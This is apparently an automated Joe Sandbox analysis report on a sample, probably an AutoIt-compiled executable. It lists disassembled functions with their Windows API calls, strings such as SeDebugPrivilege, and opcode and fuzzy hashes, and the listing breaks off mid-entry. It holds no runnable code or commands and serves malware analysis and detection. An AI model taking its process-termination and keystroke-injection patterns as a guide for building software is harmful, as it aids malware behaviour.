Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: d553e29b3fdd47fdbfc5c2b2c3786c880a590b67b3105574cbc6947bd8a591b9
Instruction ID: b3c17ad0e9f54eac4c50fba4a74767fa8034829e586560e2525f86b38b1ab11c
Opcode Fuzzy Hash: d553e29b3fdd47fdbfc5c2b2c3786c880a590b67b3105574cbc6947bd8a591b9
Instruction Fuzzy Hash: AC517A70204304EFD704DF24CC5AF6A7BE5FB88314F04852DF5959B2A1DB78A969CB52

Function 007B8F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,007CF910), ref: 007B903D
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,007CF910), ref: 007B9071
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 007B91EB
SysFreeString.OLEAUT32(?), ref: 007B9215

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: a6ebf85d918c7eae33da264f848091a0736ee0da32ed8acc881d3aac43b07401
Instruction ID: 5c94538ae01a1363eee5cd0f5d51f8c12a51aa56d83d58c889bc3d6b932d3aff
Opcode Fuzzy Hash: a6ebf85d918c7eae33da264f848091a0736ee0da32ed8acc881d3aac43b07401
Instruction Fuzzy Hash: 4CF1F771A00209EFDB04DF94C888EEEB7B9FF49315F108459F625AB251DB35AE46CB60

Function 007BF9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007BF9C9
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007BFB5C
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007BFB80
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007BFBC0
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007BFBE2
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007BFD5E
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 007BFD90
CloseHandle.KERNEL32(?), ref: 007BFDBF
CloseHandle.KERNEL32(?), ref: 007BFE36

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 74661d8709ed1fc5cb21c7733e664a0acd4552038a4a6d413e7f81c2f808e1f4
Instruction ID: 4fe69d96d24c11fd7396d41deaa11dcdbb71e127f411db4fd8077ccd05cd8c2f
Opcode Fuzzy Hash: 74661d8709ed1fc5cb21c7733e664a0acd4552038a4a6d413e7f81c2f808e1f4
Instruction Fuzzy Hash: C2E1D631204341DFCB14EF24C895BABBBE1AF85710F14856DF89A9B2A2DB39DC45CB52

Function 007A4F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 007A48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007A38D3,?), ref: 007A48C7

Part of subcall function 007A48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007A38D3,?), ref: 007A48E0

Part of subcall function 007A4CD3: GetFileAttributesW.KERNEL32(?,007A3947), ref: 007A4CD4

lstrcmpiW.KERNEL32(?,?), ref: 007A4FE2
_wcscmp.LIBCMT ref: 007A4FFC
MoveFileW.KERNEL32(?,?), ref: 007A5017

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: f69965f11becab18780042d00dd36261c1d3a676a1e67d109cbc649bcd2f2db4
Instruction ID: fabfa94172260674d5f27cc6d88066c7523c40329aceaa7fc519a058e6352de3
Opcode Fuzzy Hash: f69965f11becab18780042d00dd36261c1d3a676a1e67d109cbc649bcd2f2db4
Instruction Fuzzy Hash: 865182B21087849BC724DB60C8859DFB3ECAFC5300F004A2EF589D3152EF79A289C766

Function 007C88B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 007C896E

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: be89be742395e499b415e2966515e4568375de11eb464ce65f6b8c70ce90a0ce
Instruction ID: 770193d115e8cba2685cfa9248f579b1d3953150de8f893f9c5da058bc117f46
Opcode Fuzzy Hash: be89be742395e499b415e2966515e4568375de11eb464ce65f6b8c70ce90a0ce
Instruction Fuzzy Hash: B5518230510209FEDF609F24CC89FAD7BA5BB05310F60812EF515E66A1DF79AD909B92

Function 00742B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0077C547
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0077C569
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0077C581
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0077C59F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0077C5C0
DestroyIcon.USER32(00000000), ref: 0077C5CF
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0077C5EC
DestroyIcon.USER32(?), ref: 0077C5FB

Part of subcall function 007CA71E: DeleteObject.GDI32(00000000), ref: 007CA757

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: ab998372f4c572b41028417eb9d3145f7d1e6ff417b82456fb2efb2dbaf77ed8
Instruction ID: 3192e3503cfe7d54ecbf66b6df98cb2d291239c7fc79f2b366dc6bd516fd7773
Opcode Fuzzy Hash: ab998372f4c572b41028417eb9d3145f7d1e6ff417b82456fb2efb2dbaf77ed8
Instruction Fuzzy Hash: DA514970600209EFDB24DF24CC45FAA3BA5FB58350F50852CF906972A1EB79E9A1DB60

Function 00799B50 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0079AE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 0079AE77
Part of subcall function 0079AE57: GetCurrentThreadId.KERNEL32 ref: 0079AE7E
Part of subcall function 0079AE57: AttachThreadInput.USER32(00000000,?,00799B65,?,00000001), ref: 0079AE85

MapVirtualKeyW.USER32(00000025,00000000), ref: 00799B70
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00799B8D
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00799B90
MapVirtualKeyW.USER32(00000025,00000000), ref: 00799B99
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00799BB7
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00799BBA
MapVirtualKeyW.USER32(00000025,00000000), ref: 00799BC3
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00799BDA
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00799BDD

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: db75caaa445c2a796872b65d0379e167cbc9247110f65a4fa0508c1881446b1f
Instruction ID: d24d8801b5fc8973d622b36a08664adccd239b2206ee2e9235306efd4e87d69b
Opcode Fuzzy Hash: db75caaa445c2a796872b65d0379e167cbc9247110f65a4fa0508c1881446b1f
Instruction Fuzzy Hash: CF11E5B1550218FFFA106B64EC4EF6A3B1EDB4C755F114429F344AB0A0CAF75C10DAA8

Function 00798E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00798A84,00000B00,?,?), ref: 00798E0C
HeapAlloc.KERNEL32(00000000,?,00798A84,00000B00,?,?), ref: 00798E13
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00798A84,00000B00,?,?), ref: 00798E28
GetCurrentProcess.KERNEL32(?,00000000,?,00798A84,00000B00,?,?), ref: 00798E30
DuplicateHandle.KERNEL32(00000000,?,00798A84,00000B00,?,?), ref: 00798E33
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00798A84,00000B00,?,?), ref: 00798E43
GetCurrentProcess.KERNEL32(00798A84,00000000,?,00798A84,00000B00,?,?), ref: 00798E4B
DuplicateHandle.KERNEL32(00000000,?,00798A84,00000B00,?,?), ref: 00798E4E
CreateThread.KERNEL32(00000000,00000000,00798E74,00000000,00000000,00000000), ref: 00798E68

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 2e4eca02cc2f91572e7a92a32d85efa40526a2ed900000a9d3236de6f6e3e3d3
Instruction ID: 7f1bb77e811dee341387f0a00a60f81c00bd63995a15f1754925bef618d68dab
Opcode Fuzzy Hash: 2e4eca02cc2f91572e7a92a32d85efa40526a2ed900000a9d3236de6f6e3e3d3
Instruction Fuzzy Hash: 4801BBB5240308FFE710ABA5DC4DF6B7BADEB89711F048425FA05DB2A1CA749C00CB24

Function 007B9A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00797652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0079758C,80070057,?,?,?,0079799D), ref: 0079766F
Part of subcall function 00797652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0079758C,80070057,?,?), ref: 0079768A
Part of subcall function 00797652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0079758C,80070057,?,?), ref: 00797698
Part of subcall function 00797652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0079758C,80070057,?), ref: 007976A8

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 007B9B1B
_memset.LIBCMT ref: 007B9B28
_memset.LIBCMT ref: 007B9C6B
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 007B9C97
CoTaskMemFree.OLE32(?), ref: 007B9CA2

Strings

NULL Pointer assignment, xrefs: 007B9CF0

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 8926d5431121316393aaba4b1fe688bb008c79ff8f82c23fd3555eebcb7ed52a
Instruction ID: 3adc7c694173db17737113857bd7654a69438b4fdf346619cc6841c95e5b3182
Opcode Fuzzy Hash: 8926d5431121316393aaba4b1fe688bb008c79ff8f82c23fd3555eebcb7ed52a
Instruction Fuzzy Hash: 02913A71D00229EBDF10DFA5DC85EDEBBB9AF08710F20815AF619A7281DB755A44CFA0

Function 007C6FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007C7093
SendMessageW.USER32(?,00001036,00000000,?), ref: 007C70A7
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007C70C1
_wcscat.LIBCMT ref: 007C711C
SendMessageW.USER32(?,00001057,00000000,?), ref: 007C7133
SendMessageW.USER32(?,00001061,?,0000000F), ref: 007C7161

Strings

SysListView32, xrefs: 007C7065

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 993247d255c351aff7e305bba8e82e585717ed9e1b41f273540af0d36be4311b
Instruction ID: f8ddd87b321d4d95bae0fda4e1b36faf5fb89d5e950cb87a879facd668b58f68
Opcode Fuzzy Hash: 993247d255c351aff7e305bba8e82e585717ed9e1b41f273540af0d36be4311b
Instruction Fuzzy Hash: 9E418071A04308EBDB259F64CC89FEA77A9EF08350F10452EF544A7292D6799D84CB50

Function 007BEC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 007A3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 007A3EB6
Part of subcall function 007A3E91: Process32FirstW.KERNEL32(00000000,?), ref: 007A3EC4
Part of subcall function 007A3E91: CloseHandle.KERNEL32(00000000), ref: 007A3F8E

OpenProcess.KERNEL32(00000001,00000000,?), ref: 007BECB8
GetLastError.KERNEL32 ref: 007BECCB
OpenProcess.KERNEL32(00000001,00000000,?), ref: 007BECFA
TerminateProcess.KERNEL32(00000000,00000000), ref: 007BED77
GetLastError.KERNEL32(00000000), ref: 007BED82
CloseHandle.KERNEL32(00000000), ref: 007BEDB7

Strings

SeDebugPrivilege, xrefs: 007BECD6

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 985521397750016eb0be7090b924fc18e72d6869cb02a26af829e6d4ad3e2de8
Instruction ID: 8c2e5e2a77aa1f19cb4e560f5b186247666a7d5e05d3fba7261831addc805ab8
Opcode Fuzzy Hash: 985521397750016eb0be7090b924fc18e72d6869cb02a26af829e6d4ad3e2de8
Instruction Fuzzy Hash: C8416D71304201DFDB14EF24CC99FAEB7A5AF81714F188459F9429B3D2DBB9A804CB95

Function 007A3226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 007A32C5

Strings

stop, xrefs: 007A3296
warning, xrefs: 007A32AE
question, xrefs: 007A327E
info, xrefs: 007A3266
blank, xrefs: 007A3247

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: d9aab84d83676eba7552c040e2b3b4f271fc461ef67dbc394dae5c05c1bad109
Instruction ID: f2a7a512a361290fe1000465c98cf7ed735ca5a8be7ea981776ee82d080c3afb
Opcode Fuzzy Hash: d9aab84d83676eba7552c040e2b3b4f271fc461ef67dbc394dae5c05c1bad109
Instruction Fuzzy Hash: 4311277120874AFBA7055F54DC43E6AB79CFF5B370F20012AF905A62C1E66D6B4045A5

Function 007A4534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 007A454E
LoadStringW.USER32(00000000), ref: 007A4555
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 007A456B
LoadStringW.USER32(00000000), ref: 007A4572
_wprintf.LIBCMT ref: 007A4598
MessageBoxW.USER32(00000000,?,?,00011010), ref: 007A45B6

Strings

%s (%d) : ==> %s: %s %s, xrefs: 007A4593

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: c93fb3f7a32decd6834fe203b20443b92fea94a3e32a700a36f615e088e581b5
Instruction ID: 879c4cc96d094385de12386eeb8b01cf3c53890151dfbf553744359d658030ae
Opcode Fuzzy Hash: c93fb3f7a32decd6834fe203b20443b92fea94a3e32a700a36f615e088e581b5
Instruction Fuzzy Hash: 31014FF2900208BFE710A7A09D89EE6776DD708301F0045A9FB49E2151EA799E858B79

Function 007CD74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623

GetSystemMetrics.USER32(0000000F), ref: 007CD78A
GetSystemMetrics.USER32(0000000F), ref: 007CD7AA
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 007CD9E5
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 007CDA03
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 007CDA24
ShowWindow.USER32(00000003,00000000), ref: 007CDA43
InvalidateRect.USER32(?,00000000,00000001), ref: 007CDA68
DefDlgProcW.USER32(?,00000005,?,?), ref: 007CDA8B

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: aecdd5736bd455be79ade44e5eac42e487e14e32d52e005bd789a0e3b7cded41
Instruction ID: e5279f44af32e31d29a74c47782785dce06884480f213f7ac37949663715a84b
Opcode Fuzzy Hash: aecdd5736bd455be79ade44e5eac42e487e14e32d52e005bd789a0e3b7cded41
Instruction Fuzzy Hash: EDB16675600225ABDF24CF68C989BAD7BB2FF48701F09C17DED48AA295D738AD50CB50

Function 00742A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0077C417,00000004,00000000,00000000,00000000), ref: 00742ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0077C417,00000004,00000000,00000000,00000000,000000FF), ref: 00742B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0077C417,00000004,00000000,00000000,00000000), ref: 0077C46A
